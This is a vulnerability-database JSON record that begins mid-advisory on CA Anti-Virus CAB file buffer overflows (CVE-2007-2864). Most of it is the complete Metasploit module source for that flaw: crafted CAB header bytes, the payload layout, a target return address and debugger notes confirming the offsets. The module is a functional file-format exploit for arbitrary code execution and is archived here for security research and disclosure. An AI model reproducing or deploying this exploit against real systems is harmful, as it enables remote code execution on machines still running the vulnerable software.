\r\nVulnerability" form. 
\r\nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, 1 CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www.ca.com/us/contact/\r\nLegal Notice http://www.ca.com/us/legal/\r\nPrivacy Policy http://www.ca.com/us/privacy/\r\nCopyright (c) 2007 CA. All rights reserved.", "edition": 1, "modified": "2007-06-11T00:00:00", "published": "2007-06-11T00:00:00", "id": "SECURITYVULNS:DOC:17209", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17209", "title": "[CAID 35395, 35396]: CA Anti-Virus Engine CAB File Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "CA Antivirus Engine CAB Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83164", "href": "https://packetstormsecurity.com/files/83164/CA-Antivirus-Engine-CAB-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/projects/Framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA Antivirus Engine CAB Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in CA eTrust Antivirus 8.1.637. \nBy creating a specially crafted CAB file, an an attacker may be able \nto execute arbitrary code. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'BID', '24330' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-035.html' ], \n[ 'CVE', '2007-2864' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 250, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)', { 'Ret' => 0x6dc886ea } ], # inocore.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 05 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'msf.cab']), \n], self.class) \n \nend \n \ndef exploit \n \ncab_header = \"\\x4D\\x53\\x43\\x46\\x00\\x00\\x00\\x00\\xC4\\x0D\\x00\\x00\\x00\\x00\\x00\\x00\" \ncab_header << \"\\x2C\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x01\\x01\\x00\\x01\\x00\\x00\\x00\" \ncab_header << \"\\xD2\\x04\\x00\\x00\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x78\\x0D\\x00\\x00\" \ncab_header << \"\\x00\\x00\\x00\\x00\\x00\\x00\\xE2\\x36\\x53\\xAD\\x20\\x00\" \n \nsploit = make_nops(268 - payload.encoded.length) + payload.encoded \nsploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') \nsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-260\").encode_string \nsploit << make_nops(800) \n \ncab = cab_header + sploit \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nfile_create(cab) \n \nend \n \nend \n \n=begin \n0:001> !exchain \n00cdf1b0: VetE!InoAvpackDat+ca058 (600d19c8) \n00cdf2fc: 316a4130 \nInvalid exception stack at 6a413969 \n0:001> !pattern_offset 1024 0x6a413969 \n[Byakugan] Control of 0x6a413969 at offset 268. \n0:001> !pattern_offset 1024 0x316a4130 \n[Byakugan] Control of 0x316a4130 at offset 272. 
\n0:001> u 0x6dc886ea L3 \nINOCORE!QSIInitQSysInfo+0x278a: \n6dc886ea 5f pop edi \n6dc886eb 5e pop esi \n6dc886ec c3 ret \n=end \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83164/ca_cab.rb.txt"}]}